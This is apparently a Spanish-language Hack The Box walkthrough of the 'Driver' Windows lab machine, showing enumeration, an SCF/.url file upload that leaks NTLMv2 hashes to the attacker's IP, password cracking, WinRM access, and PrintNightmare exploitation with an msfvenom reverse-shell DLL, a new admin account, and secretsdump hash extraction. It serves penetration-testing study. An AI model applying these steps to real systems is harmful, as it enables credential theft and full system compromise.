This page looks best with JavaScript enabled

Hack The Box - Driver

 •  ✍️ sckull
featured image

En driver encontramos un sitio web que nos permite subir archivos a un recurso compartido de SMB, utilizamos un archivo sfc lo que nos permitió obtener el hash de un primer usuario y acceso por WinRM. Finalmente escalamos privilegios explotando la vulnerabilidad del servicio spool con PrintNightmare.

Nombre Driver box_img_maker
OS

Windows

Puntos 20
Dificultad Facil
IP 10.10.11.106
Maker

MrR3boot
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[4.9, 5.9, 6.2, 3.8, 4.1],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

Nmap

nmap muestra distintos puertos abiertos: HTTP (80), RPC (445), SMB (445), WinRM (5985).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.11s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h19m09s, deviation: 0s, median: 7h19m08s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-10-05T07:24:55
|_  start_date: 2021-10-05T06:27:26

SMB

Utilizando algunas herramientas intentamos enumerar los recursos compartidos en samba pero no encontramos alguno.

1
2
3
4
5
6
7

 π ~/htb/driver ❯ smbclient -L 10.10.11.106
Enter WORKGROUP\kali's password:
session setup failed: NT_STATUS_ACCESS_DENIED 
 π ~/htb/driver ❯ crackmapexec smb 10.10.11.106 --shares
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB         10.10.11.106    445    DRIVER           [-] Error enumerating shares: Error occurs while reading from remote(104)
 π ~/htb/driver ❯

RPC

De igual forma con una sesion nula por RCP no logramos ingresar.

1
2
3

 π ~/htb/driver ❯ rpcclient -U "" -N 10.10.11.106
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED
 π ~/htb/driver ❯

Web Site

En el puerto 80 vemos que pregunta por credenciales para el usuario admin.
image

Utilizamos el nombre de usuario como contraseña (admin:admin) con los cuales logramos ingresar. Observamos un mensaje sobre tests de firmwares y drivers, además se muestra un dominio en el footer de la pagina el cual agregamos al archivo /etc/hosts.
image

Vemos en la pagina de Firmware Updates un formulario para subir acrhivos de actualización de firmware, en el mensaje indica la selección de un modelo de impresora y, al subir los archivos estos se guardarían en algun recurso compartido de archivos (“refiriendose a SMB”), y que, algun equipo realizará una revision y testing.
image

Directory Brute Forcing

Utilizamos feroxbuster para busqueda de directorios y archivos, con la extensión php junto con el header de autenticacion del sitio. Vemos que solo se muestran un par de direcciónes y ninguna relacionada a una carpeta de archivos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

 π ~/htb/driver ❯ feroxbuster -u http://driver.htb/ -w $MD -x php -H "Authorization: Basic YWRtaW46YWRtaW4="

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://driver.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🤯  Header                │ Authorization:  Basic YWRtaW46YWRtaW4=
 💲  Extensions            │ [php]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301        2l       10w      148c http://driver.htb/images
200      185l      379w     4279c http://driver.htb/index.php
301        2l       10w      148c http://driver.htb/Images
200      185l      379w     4279c http://driver.htb/Index.php

User - Tony

El sitio web nos permite subir archivos, intentamos con diferentes formatos pero parece ser que ninguno es ejecutado o movido a algun otro directorio. Al investigar sobre ataques por archivos en SMB, encontramos SCF File Attacks. Dicho ataque utiliza una direccion UNC o direccion de recurso definida en IconFile dentro de un archivo .scf, al colocar este archivo en un recurso y un usuario al acceder a este, el archivo es ejecutado y, el usuario intenta acceder al recurso definido (IconFile) lo que hace que se autentique en el recurso y al tener responder en ejecución es posible capturar el hash de autenticación del usuario.

Replicamos este ataque, creando un archivo que contenga nuestra direccion IP.

1
2
3
4
5
6
7

 π ~/htb/driver ❯ cat scx.scf
[Shell]
Command=2
IconFile=\\10.10.10.15\sckull.ico
[Taskbar]
Command=ToggleDesktop
 π ~/htb/driver ❯

Ejecutamos responder, subimos el archivo y tras unos segundos vemos que el usuario tony accede al recurso, con ello obtuvimos el hash ntlm.

1
2
3
4
5
6

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:0b940ebf05184c8d:2CEA298880C79699FAED0D1BD590BA8E:010100000000000080A2972CCEB7D70160670D2514033A9300000000020008003600340030004D0001001E00570049004E002D005600440041005600410041004300580055003700530004003400570049004E002D00560044004100560041004100430058005500370053002E003600340030004D002E004C004F00430041004C00030014003600340030004D002E004C004F00430041004C00050014003600340030004D002E004C004F00430041004C000700080080A2972CCEB7D70106000400020000000800300030000000000000000000000000200000D7D5A09B6D6231233A414B29A11FD4730FD7091D7057F8686380C4839199EAF50A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0033003000000000000000000000000000
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony

Crack Hash

Utilizamos John con el wordlist rockyou.txt para crackear el hash de tony.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/driver ❯ john --wordlist=$ROCK hash_tony
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony          (tony)
1g 0:00:00:00 DONE (2021-10-02 20:44) 9.090g/s 297890p/s 297890c/s 297890C/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
 π ~/htb/driver ❯

Shell

nmap mostró que el puerto WinRM esta abierto, utilizamos las credenciales que obtuvimos para acceder por este puerto utilizando evil-winrm, logrando obtener la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

 π ~/htb/driver ❯ evil-winrm -i driver.htb -u tony -p liltony

Evil-WinRM shell v3.3

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> type ..\Desktop\user.txt
4d5bc94c1589f8e3d3bbc7ef748c97e6
*Evil-WinRM* PS C:\Users\tony\Documents>

.URL

De igual forma utilizando un archivo .url funciona para obtener el hash de tony.

1
2
3
4
5

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.10.10.15\%USERNAME%.icon
IconIndex=1

Web Site

En el directorio inetpub\ encontramos el codigo fuente de la página, vemos que esta definido el tipo de autenticacion por http y se muestran las credenciales, además vemos que el directorio donde se almacenan los archivos es C:\firmwares\.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

*Evil-WinRM* PS C:\inetpub\wwwroot> dir -Force


    Directory: C:\inetpub\wwwroot


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9/7/2021  11:29 PM                images
-a----         9/8/2021   5:06 AM           6136 fw_up.php
-a----         9/8/2021   4:51 AM           4906 index.php


*Evil-WinRM* PS C:\inetpub\wwwroot> cat fw_up.php

<?php
if( ( isset($_SERVER['PHP_AUTH_USER'] ) && ( $_SERVER['PHP_AUTH_USER'] == "admin" ) ) AND
      ( isset($_SERVER['PHP_AUTH_PW'] ) && ( $_SERVER['PHP_AUTH_PW'] == "admin" )) )
    {
      if($_SERVER['REQUEST_METHOD']=="POST"){
        $target_dir = "C:\\firmwares\\";
        $target_file = $target_dir . basename($_FILES["firmware"]["name"]);
          if (move_uploaded_file($_FILES["firmware"]["tmp_name"], $target_file)) {
            header('Location: fw_up.php?msg=SUCCESS');
          }
          else {
            header('Location: fw_up.php?msg=ERR');
          }
      }
      else
        {?>
[... snip ...]

<br/><p>&nbsp;&nbsp; Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
  <br/><form action="" method="post" enctype="multipart/form-data">
<br/><center> <table>
  <tr><td>Printer Model:</td><td><select name="printers" id="printers">
  <option value="HTB DesignJet">HTB DesignJet</option>
  <option value="HTB Ecotank">HTB Ecotank</option>
  <option value="HTB Laserjet Pro">HTB Laserjet Pro</option>
  <option value="HTB Mono">HTB Mono</option>
</select></td></tr>
<tr><td>Upload Firmware:</td><td><input type="file" id="firmware" name="firmware"></td>
  </tr>
  <tr>
    <td colspan="2"><input type="Submit" value="Submit"/></td></tr>
</table></center></form>

</body>
<div class="footer">
  <p>&#169; 2021 Driver Inc</p>
  <p><a href="mailto:support@driver.htb">support@driver.htb</a></p>
</div>
</html>
 <?php }}else
    {
        //Send headers to cause a browser to request
        //username and password from user
        header("WWW-Authenticate: " .
            "Basic realm=\"MFP Firmware Update Center\"");
        header("HTTP/1.0 401 Unauthorized");

        //Show failure text, which browsers usually
        //show only after several failed attempts
        print("Invalid Credentials");
    } ?>
*Evil-WinRM* PS C:\inetpub\wwwroot>

Dicho directorio no contiene nada, quizas algun cronjob elimina cada cierto tiempo los archivos.

1
2

*Evil-WinRM* PS C:\inetpub\wwwroot> dir -Force C:\firmwares\
*Evil-WinRM* PS C:\inetpub\wwwroot>

Privesc

Ejecutamos WinPEAS, donde vemos una tarea programada al cual Tony tiene acceso.

1
2
3
4
5
6

ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
    (DRIVER\Administrator) VerifyFirmware: C:\Users\tony\appdata\local\job\job.bat
    Permissions file: tony [AllAccess]
    Permissions folder(DLL Hijacking): tony [AllAccess]
    Trigger: At log on of DRIVER\tony

Vemos que el script accede a la carpeta donde se encuentran los archivos subidos en el sitio web utilizando el Explorer.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

*Evil-WinRM* PS C:\Users\tony\Documents> cat C:\Users\tony\appdata\local\job\job.bat
@echo off

:LOOP

%SystemRoot%\explorer.exe "C:\firmwares"

ping -n 20 127.0.0.1 > nul && powershell -ep bypass c:\users\tony\appdata\local\job\quit.ps1

DEL /q C:\firmwares\*

cls

GOTO :LOOP

:EXIT
*Evil-WinRM* PS C:\Users\tony\Documents> cat c:\users\tony\appdata\local\job\quit.ps1
$folder = [uri]'C:\firmwares'
foreach ($w in (New-Object -ComObject Shell.Application).Windows()){ 
  if ($w.LocationUrl -ieq $folder.AbsoluteUri){
    $w.Quit(); 
    break
  }
}
*Evil-WinRM* PS C:\Users\tony\Documents>

Finalmente vemos en el historial de la consola una impresora que fue agregada utilizando powershell, dicha version de impresora puede ser explotada para Escalar Privilegios, sin embargo por alguna razon la explotación no tuvo exito, aún asi intentado con el Modulo de Metasploit.

1
2
3
4
5
6

*Evil-WinRM* PS C:\Users\tony\Documents> cat "C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1
*Evil-WinRM* PS C:\Users\tony\Documents>

PrintNightmare

Recientemente se descubrió una vulnerabilidad en el servicio Spooler que permite escalar privilegios - (CVE-2021-34527). Al escanear la maquina utilizando rpcdump vemos que podria ser vulnerable.

1
2
3
4

 π ~/htb/driver ❯ impacket-rpcdump tony:liltony@driver.htb | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
 π ~/htb/driver ❯

cube0x0

Para explotar la vulnerabilidad utilizamos el PoC de cube0x0 que encontramos en el Repositorio de GitHub - CVE-2021-1675, realizamos la instalación de la version modificada de impacket.

1
2
3
4

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Para la explotación necesitamos un servidor samba, impacket provee el script smbserver para crear uno.

1
2
3
4
5
6
7
8
9

 π ~/htb/driver ❯ impacket-smbserver sc .
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

El PoC necesita un DLL el cual es ejecutado, utilizamos msfvenom para generar una DLL con shell inversa, almancenando esta en el directorio donde ejecutamos smbserver.

1
2
3
4
5
6
7
8

 π ~/htb/driver ❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=1339 -f dll -o sc.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 8704 bytes
Saved as: sc.dll
 π ~/htb/driver ❯

Finalmente ejcutamos el PoC pasando las credenciales y la dirección del DLL en nuestro servidor samba.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/driver ❯ ./CVE-2021-1675.py tony:liltony@driver.htb '\\10.10.14.30\sc\sc.dll'
[*] Connecting to ncacn_np:driver.htb[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.30\sc\sc.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

Con la ejecucion de netcat en el puerto especificado en msfvenom obtuvimos una shell como usuario root (Administrador), finalmente nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/driver ❯ rlwrap nc -lvp 1339
listening on [any] 1339 ...
connect to [10.10.14.30] from driver.htb [10.10.11.106] 49423
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
bcb9fc23e9309e32a7e543d5126e88f6
C:\Windows\system32>

Powershell

Tambien existe una version para Powershell escrita por Caleb Stewart | John Hammond el cual crea un usuario como administrador y de igual manera es posible utilizar un DLL. Utilizando evil-winrm importamos el archivo y agregamos un nuevo usuario, vemos que este pertenece al grupo de administradores.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

*Evil-WinRM* PS C:\Users\tony\Documents> upload CVE-2021-1675.ps1
Info: Uploading CVE-2021-1675.ps1 to C:\Users\tony\Documents\CVE-2021-1675.ps1
[... snip ...]
Info: Upload successful!

*Evil-WinRM* PS C:\Users\tony\Documents> cat -raw CVE-2021-1675.ps1|iex
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -NewUser "sckull" -NewPassword "sckullx123"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user sckull as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\Users\tony\Documents> net user sckull
User name                    sckull
Full Name                    sckull
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/9/2021 5:48:21 AM
Password expires             Never
Password changeable          10/9/2021 5:48:21 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

*Evil-WinRM* PS C:\Users\tony\Documents>

Con el usuario creado podemos acceder con full permisos de Administrador utilizando psexec y obtener los hashes utilizando secretsdump.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

 π ~/htb/driver ❯ impacket-psexec sckull:sckullx123@driver.htb
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on driver.htb.....
[*] Found writable share ADMIN$
[*] Uploading file boxhjDuT.exe
[*] Opening SVCManager on driver.htb.....
[*] Creating service Czhp on driver.htb.....
[*] Starting service Czhp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

 π ~/htb/driver ❯ impacket-secretsdump sckull:sckullx123@driver.htb
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe5b3cda034afd685bc69ccd3c4e9387c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d1256cff8b5b5fdb8c327d3b6c3f5017:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tony:1003:aad3b435b51404eeaad3b435b51404ee:dfdb5b520de42ca5d1b84ce61553d085:::
sckull:1004:aad3b435b51404eeaad3b435b51404ee:44198dfc6b720ccdd3323386972d127e:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
DRIVER\tony:liltony
[*] DPAPI_SYSTEM
dpapi_machinekey:0x68d8efd1bd3fa3ab206268f0bbc6e2a4a5e4b43e
dpapi_userkey:0x68060403e8f0276a683ad704b45dc7b850d9722f
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
 π ~/htb/driver ❯

Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: Driver